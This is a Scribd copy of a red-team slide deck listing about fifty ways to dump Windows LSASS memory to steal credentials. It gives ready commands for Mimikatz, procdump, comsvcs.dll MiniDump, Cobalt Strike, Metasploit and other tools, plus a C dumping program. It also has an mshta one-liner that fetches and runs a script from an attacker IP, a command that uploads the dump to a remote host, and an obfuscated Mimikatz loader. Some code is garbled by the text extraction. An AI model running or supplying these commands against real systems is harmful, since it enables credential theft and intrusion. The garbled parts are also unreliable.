Scribd
Upload
142 views

50 Methods For Dump LSASS

Uploaded by

Douglas Dias
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
142 views

50 Methods For Dump LSASS

Uploaded by

Douglas Dias
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 52

50 METHODS FOR DUMP LSASS

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MIMIKATZ

Usage
Sekurlsa::logonpasswords
Sekurlsa::minidump
lsadump::dcsync

REDTEAMRECIPE.COM POWERED BY HADESS.IO


PROCDUMP

Usage
procdump -ma lsass.exe lsass.dmp
procdump -accepteula -64 -ma lsass.exe
lsass.dmp

REDTEAMRECIPE.COM POWERED BY HADESS.IO


PROCESS HACKER

Usage
System->LSASS process->Create Dump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


DUMPIT

Usage
tasklist /FI "IMAGENAME eq lsass.exe"
DumpIt.exe PID output_file_name.bin

REDTEAMRECIPE.COM POWERED BY HADESS.IO


WINDOWS DEBUGGING TOOLS

Usage
windbg -p <lsass process id>
.dump /ma c:\path\to\lsass.dmp
.detach
.q

REDTEAMRECIPE.COM POWERED BY HADESS.IO


FTK IMAGER

Usage
Create Disk Image
Physical Drive
Capture Memory
LSASS.exe

REDTEAMRECIPE.COM POWERED BY HADESS.IO


VOLATILITY

Usage
Pstree
volatility -f memory_dump.raw --
profile=Win7SP1x64 memdump -p
<lsass_pid> -D <output_directory>

REDTEAMRECIPE.COM POWERED BY HADESS.IO


WINPMEM

Usage
winpmem.exe -o dump.raw

REDTEAMRECIPE.COM POWERED BY HADESS.IO


HIBERFIL.SYS

Usage
windbg.exe -y
srv*c:\symbols*http://msdl.microsoft.com/downloa
d/symbols -i c:\symbols -z C:\hiberfil.sys
Yes
!process 0 0 lsass.exe
!process 0 0 lsass.exe; .dump /ma <output file
path>

REDTEAMRECIPE.COM POWERED BY HADESS.IO


WINDOWS ERROR REPORTING

Usage
HKLM\SOFTWARE\Microsoft\Windows\Windo
ws Error Reporting\LocalDumps-
>DumpType->2
Lsass-Shtinkering.exe

REDTEAMRECIPE.COM POWERED BY HADESS.IO


LIVEKD

Usage
LiveKd.exe -w
!process 0 0 lsass.exe
.process /p [lsass PID]
.dump /ma [dump file path]

REDTEAMRECIPE.COM POWERED BY HADESS.IO


TASK MANAGER

Usage
Powershell -ep bypass
Get-Process lsass
C:\Windows\System32\Taskmgr.exe
/dumpfile=C:\lsass.dmp /pid=<LSASS_PID>

REDTEAMRECIPE.COM POWERED BY HADESS.IO


COBALT STRIKE+SHARPDUMP

Usage
Execute-assembly
SharpDump
Or
load sharpdump
sharpdump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


COBALT STRIKE+MIMIKATZ_COMMAND

Usage
Mimikatz_command
sekurlsa::minidump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


COBALT STRIKE+TASKKILL

Usage
taskkill /f /im lsass.exe

REDTEAMRECIPE.COM POWERED BY HADESS.IO


COBALT STRIKE+SYSINTERNALS

Usage
load sysinternals
Procexp
"File" -> "Save"

REDTEAMRECIPE.COM POWERED BY HADESS.IO


COBALT STRIKE+SCHTASKS

Usage
cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC
Weekly /D SAT /TN Commands /TR \"''rundll32.exe''
C:\\windows\\system32\\comsvcs.dll MiniDump
"+strPID+" C:\\Windows\\Tasks\\dump.bin full\" /ST
06:06:06 && Schtasks.exe /run /TN Commands &&
REM ' -Force;"

REDTEAMRECIPE.COM POWERED BY HADESS.IO


BRUTE RATEL C4+KIWI

Usage
load kiwi
Lsa_dump_sam
lsa_dump_secrets

REDTEAMRECIPE.COM POWERED BY HADESS.IO


METASPLOIT+LSASSY

Usage
use post/windows/gather/credentials/lsassy
set SESSION <session ID>
Run or exploit

REDTEAMRECIPE.COM POWERED BY HADESS.IO


COVENANT+SHARPKATZ

Usage
Create Task->Module->SharpKatz
Arguments->lsa_dump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


EMPIRE+WMIEXEC

Usage
Modules
credentials/mimikatz/lsass_dump
Execute or run
sekurlsa::minidump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


SLIVER+LSASS_DUMP

Usage
use lsass_dump
Options
run

REDTEAMRECIPE.COM POWERED BY HADESS.IO


VILLAIN

Usage
villain.exe agent
villain.exe client -c <IP_ADDRESS>
villain.exe dump lsass

REDTEAMRECIPE.COM POWERED BY HADESS.IO


OCTOPUS

Usage
pupy.exe shell --cmd "python -m
pupy.modules.pupywinutils.lsassdump -o
C:\temp\lsass.dmp"

REDTEAMRECIPE.COM POWERED BY HADESS.IO


NIMPLANT

Usage
lsassdump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


POSHC2+MINIDUMPWRITEDUMP

Usage
MiniDumpWriteDump
Get-LsassDumpProcDump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


POSHC2+NTQUERYVIRTUALMEMORY

Usage
NtQueryVirtualMemory
Get-LsassDumpNtQueryVirtualMemory

REDTEAMRECIPE.COM POWERED BY HADESS.IO


POSHC2+BLOODHOUND

Usage
Get-LsassDumpBloodHound

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MANJUSAKA

Usage
mshta.exe javascript:A=new ActiveXObject("WScript.Shell").run("powershell -nop -w
hidden -c IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:
<port>/r.ps1')",0);close();
Manjusaka lsass dump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


DUMPERT

Usage
Dumpert.exe -k lsass.exe -s -o lsass.dmp

REDTEAMRECIPE.COM POWERED BY HADESS.IO


NANODUMP

Usage
NanoDump.exe -t [process ID] -o [output file
path]

REDTEAMRECIPE.COM POWERED BY HADESS.IO


SPRAYKATZ

Usage
spraykatz.exe -w <domain> -u <username>
-p <password> --krb5i --mimikatz
"sekurlsa::minidump lsass.dmp" "exit"

REDTEAMRECIPE.COM POWERED BY HADESS.IO


HANDLEKATZ

Usage
HandleKatz.exe -p lsass.exe
HandleKatz.exe -p lsass.exe -o [handle ID] -
dump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


CALLBACKDUMP

Usage
CallbackDump.exe -d <dump_file_path> -p
<process_id>

REDTEAMRECIPE.COM POWERED BY HADESS.IO


LSASSSILENTPROCESSEXIT

Usage
LsassSilentProcessExit.exe <PID of LSASS.exe> <DumpMode>

REDTEAMRECIPE.COM POWERED BY HADESS.IO


ANDREWSPECIAL

Usage
AndrewSpecial
andrew.dmp!

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MASKY

Usage
.\Masky.exe /ca:'CA SERVER\CA NAME'
(/template:User) (/currentUser)
(/output:./output.txt) (/debug:./debug.txt)

REDTEAMRECIPE.COM POWERED BY HADESS.IO


SHARPMINIDUMP

Usage
SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MINIDUMP

Usage
MiniDump.exe /p <process_id> /o <output_file_name>

REDTEAMRECIPE.COM POWERED BY HADESS.IO


LSASSDUMPREFLECTIVEDLL

Usage
Import-Module .\ReflectiveLsassDump.dll
Invoke-ReflectivePEInjection -PEBytes (Get-
Content ReflectiveLsassDump.dll -Encoding
Byte) -ProcessID (Get-Process lsass).Id

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MOONSOLS WINDOWS MEMORY TOOLKIT

Usage
MoonSolsWindowsMemoryToolkit.exe
Dumping->Launch DumpIt
LSASS->Select the process to dump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MINIDUMPWRITEDUMP
#include <windows.h>
#include <dbghelp.h>

int main()
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, <lsass_process_id>);
if (hProcess == NULL)
{
printf("Failed to open process: %u\n", GetLastError());
return 1;
}

WCHAR dumpFileName[MAX_PATH];

Usage
swprintf(dumpFileName, MAX_PATH, L"lsass.dmp");

HANDLE hDumpFile = CreateFile(dumpFileName, GENERIC_WRITE, 0, NULL,


CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDumpFile == INVALID_HANDLE_VALUE)
{
printf("Failed to create dump file: %u\n", GetLastError());
CloseHandle(hProcess);
return 1;
}

BOOL success = MiniDumpWriteDump(hProcess, <lsass_process_id>,


hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
if (!success)
{
printf("Failed to create minidump: %u\n", GetLastError());
CloseHandle(hDumpFile);
CloseHandle(hProcess);
OpenProcess return 1;
}
MiniDumpWriteDump
CloseHandle(hDumpFile);
CloseHandle(hProcess);

return 0;
}
REDTEAMRECIPE.COM ```
POWERED BY HADESS.IO
COMSVCS.DLL

Usage
regsvr32 comsvcs.dll
rundll32.exe
C:\Windows\System32\comsvcs.dll,
MiniDump lsass.exe lsass.dmp full

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MIRRORDUMP

Usage
.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824

REDTEAMRECIPE.COM POWERED BY HADESS.IO


DUMPY

Usage
dumpy.exe dump -k secretKey -u http://remotehost/upload force

REDTEAMRECIPE.COM POWERED BY HADESS.IO


RTOOLZ+PROCEXP152.SYS

Usage
.\procexp64.exe -accepteula /t
RToolZ -p <pid>

REDTEAMRECIPE.COM POWERED BY HADESS.IO


SHARPUNHOOKER+LSASSUNHOOKER

Usage
LsassUnhooker.exe -r <output_file_path>
SharpUnhooker.exe inject --process
lsass.exe --modulepath ReflectiveDLL.dll
SharpUnhooker.exe dump --process
lsass.exe --output lsass_dump.bin

REDTEAMRECIPE.COM POWERED BY HADESS.IO


HASHDUMP

Usage
Kldumper.exe
laZagne_x64.exe
PwDump7.exe
QuarksPwDump.exe
SqlDumper.exe
Wce_x64.exe
SAMInside.exe

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MIMIKATZ+INVOKE-OBFUSCATION
Invoke-Obfuscation -ScriptBlock {
[System.Convert]::ToBase64String([System.IO.File]::ReadAll
Bytes('C:\mimikatz.exe')) } -Command 'Invoke-Expression
([System.Text.Encoding]::UTF8.GetString([System.Convert]::
FromBase64String("JABzAD0ATwB2AGkAZQBzAC4AQwBvA
G0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAU
wB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAG
MAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQ

Usage
BOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAH
MAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZA
BvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG
0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAA
oAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgA
ZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvA
HAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJ
wApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBn
ACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAd

Import-Module PowerSploit AAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzA


Invoke-Mimikatz -DumpCreds GgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAK
QBdACkA")]))'

REDTEAMRECIPE.COM POWERED BY HADESS.IO


BETTERSAFETYKATZ

Usage
.\BetterSafetyKatz.exe
.\BetterSafetyKatz.exe '.\mimikatz_trunk.zip'
Sekurlsa::minidump

REDTEAMRECIPE.COM POWERED BY HADESS.IO


REDTEAMRECIPE.COM
RedTeamRecipe is a platform designed for cybersecurity professionals who want to learn more
about red teaming and penetration testing. Red teaming is a practice where an organization
simulates a real-world cyber attack to identify vulnerabilities and improve their security
measures.

POWERED BY HADESS.IO

You might also like